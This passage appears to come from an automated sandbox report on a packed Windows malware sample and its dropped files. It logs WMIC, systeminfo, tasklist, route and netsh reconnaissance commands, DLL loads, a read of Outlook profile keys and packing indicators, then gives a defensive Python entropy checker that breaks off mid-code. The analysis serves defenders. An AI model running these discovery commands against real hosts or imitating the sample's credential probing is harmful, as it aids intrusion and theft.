    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSection loaded: apphelp.dll
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSection loaded: msimg32.dll
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSection loaded: msvcr100.dll
    Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dll
    Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
    Source: C:\Windows\explorer.exeSection loaded: webio.dll
    Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dll
    Source: C:\Users\user\AppData\Roaming\jvgasiiSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Roaming\jvgasiiSection loaded: msimg32.dll
    Source: C:\Users\user\AppData\Roaming\jvgasiiSection loaded: msvcr100.dll
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeSection loaded: nejupazabujicojoxalajahi.dll
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeSection loaded: msvcr100.dll
    Source: C:\Users\user\AppData\Roaming\uegasiiSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Roaming\uegasiiSection loaded: nejupazabujicojoxalajahi.dll
    Source: C:\Users\user\AppData\Roaming\uegasiiSection loaded: msvcr100.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: ncrypt.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: winscard.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: winhttp.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: devobj.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: ntasn1.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: msasn1.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: cryptnet.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: cryptsp.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: rsaenh.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: wbemcomn.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: amsi.dll
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: schannel.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: gpapi.dll
    Source: C:\Windows\explorer.exeSection loaded: aepic.dll
    Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
    Source: C:\Windows\explorer.exeSection loaded: userenv.dll
    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exeSection loaded: propsys.dll
    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
    Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
    Source: C:\Windows\explorer.exeSection loaded: wininet.dll
    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
    Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
    Source: C:\Windows\explorer.exeSection loaded: wldp.dll
    Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
    Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
    Source: C:\Windows\explorer.exeSection loaded: netutils.dll
    Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
    Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
    Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
    Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
    Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
    Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
    Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
    Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
    Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
    Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
    Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
    Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
    Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
    Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
    Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
    Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: winbrand.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
    The 14 WMIC.exe instances each recorded the same 16 section loads; the list is shown once:
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\ipconfig.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\ipconfig.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\System32\ROUTE.EXE | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\ROUTE.EXE | Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\ROUTE.EXE | Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\ROUTE.EXE | Section loaded: dnsapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
    Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
    Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

    Data Obfuscation

    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exe | Unpacked PE file: 0.2.O4zPA1oI9Y.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\jvgasii | Unpacked PE file: 6.2.jvgasii.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Unpacked PE file: 9.2.DE97.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yig:W;.tls:W;.jetax:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\uegasii | Unpacked PE file: 10.2.uegasii.400000.0.unpack .text:ER;.rdata:R;.data:W;.yig:W;.tls:W;.jetax:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | Code function: 11_2_00007FF7CBCA78EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process, 11_2_00007FF7CBCA78EC
    Source: DE97.exe.2.dr | Static PE information: section name: .yig
    Source: DE97.exe.2.dr | Static PE information: section name: .jetax
    Source: uegasii.2.dr | Static PE information: section name: .yig
    Source: uegasii.2.dr | Static PE information: section name: .jetax
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exe | Code function: 0_2_004014D9 pushad ; ret 0_2_004014E9
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exe | Code function: 0_2_004031DB push eax; ret 0_2_004032AB
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exe | Code function: 0_2_005F1540 pushad ; ret 0_2_005F1550
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exe | Code function: 0_2_00626460 push esp; ret 0_2_00626462
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exe | Code function: 0_2_00624803 push B63524ADh; retn 001Fh 0_2_0062483A
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exe | Code function: 0_2_00625300 pushfd ; iretd 0_2_00625301
    Source: C:\Users\user\AppData\Roaming\jvgasii | Code function: 6_2_004014D9 pushad ; ret 6_2_004014E9
    Source: C:\Users\user\AppData\Roaming\jvgasii | Code function: 6_2_004031DB push eax; ret 6_2_004032AB
    Source: C:\Users\user\AppData\Roaming\jvgasii | Code function: 6_2_006B1540 pushad ; ret 6_2_006B1550
    Source: C:\Users\user\AppData\Roaming\jvgasii | Code function: 6_2_007E4540 push esp; ret 6_2_007E4542
    Source: C:\Users\user\AppData\Roaming\jvgasii | Code function: 6_2_007E28E3 push B63524ADh; retn 001Fh 6_2_007E291A
    Source: C:\Users\user\AppData\Roaming\jvgasii | Code function: 6_2_007E33E0 pushfd ; iretd 6_2_007E33E1
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_00402842 pushad ; retf F6A4h 9_2_004029D1
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_00401065 pushfd ; retf 9_2_0040106A
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_00402805 push 21CACAEFh; iretd 9_2_0040280A
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_00402511 push ebp; iretd 9_2_00402523
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_00403325 push eax; ret 9_2_004033F3
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_00403433 pushad ; ret 9_2_004035AB
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_00401182 push esp; retf 9_2_0040118E
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_00402A9D pushad ; retf 9_2_00402AAB
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_004012B7 push cs; iretd 9_2_004012B8
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_00532578 push ebp; iretd 9_2_0053258A
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_0053286C push 21CACAEFh; iretd 9_2_00532871
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_0053131E push cs; iretd 9_2_0053131F
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_00532B04 pushad ; retf 9_2_00532B12
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_005310CC pushfd ; retf 9_2_005310D1
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Code function: 9_2_005311E9 push esp; retf 9_2_005311F5
    Source: C:\Users\user\AppData\Roaming\uegasii | Code function: 10_2_00402842 pushad ; retf F6A4h 10_2_004029D1
    Source: C:\Users\user\AppData\Roaming\uegasii | Code function: 10_2_00401065 pushfd ; retf 10_2_0040106A
    Source: C:\Users\user\AppData\Roaming\uegasii | Code function: 10_2_00402805 push 21CACAEFh; iretd 10_2_0040280A
    Source: C:\Users\user\AppData\Roaming\uegasii | Code function: 10_2_00402511 push ebp; iretd 10_2_00402523
    Source: O4zPA1oI9Y.exe | Static PE information: section name: .text entropy: 7.491043543257427
    Source: DE97.exe.2.dr | Static PE information: section name: .text entropy: 7.536145601404052
    Source: uegasii.2.dr | Static PE information: section name: .text entropy: 7.536145601404052
    Source: jvgasii.2.dr | Static PE information: section name: .text entropy: 7.491043543257427
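    The three static indicators in this section (the on-disk .text section being both executable and writable, the ".text:EW" on the right-hand side of each "Unpacked PE file" entry; the non-standard section names .yig and .jetax in DE97.exe and uegasii; and a .text entropy above 7.4, where compiler output usually sits near 6 bits per byte) can be reproduced from the PE section table alone. The script below is an added example, not Joe Sandbox's own logic: it parses the DOS/COFF headers and section table with the standard library (a stand-in for pefile), computes per-section Shannon entropy and R/W/E rights, and reports the same three findings. The PE image it runs on is constructed in the block, not one of the samples from this report.

```python
"""Packing indicators from a PE section table: high-entropy .text, non-standard
section names and sections that are writable and executable. Stdlib only; the
header walk is a minimal stand-in for pefile. Added example, not report code."""
import math
import random
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_NAMES = {".text", ".rdata", ".data", ".tls", ".rsrc", ".reloc",
                  ".idata", ".edata", ".pdata", ".bss", ".CRT"}
ENTROPY_THRESHOLD = 7.0  # bits/byte; compiler-emitted x86 code usually sits near 6.0-6.5


def shannon_entropy(data):
    """Shannon entropy in bits per byte (0.0 for empty input, 8.0 for uniform bytes)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """Walk DOS header -> PE signature -> COFF header -> section table and return
    one dict per section with its name, raw-data entropy and R/W/E rights."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(nsec):
        name, _vsize, _va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + i * 40)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        rights = "".join(flag for flag, mask in (("E", IMAGE_SCN_MEM_EXECUTE),
                                                  ("R", IMAGE_SCN_MEM_READ),
                                                  ("W", IMAGE_SCN_MEM_WRITE)) if chars & mask)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
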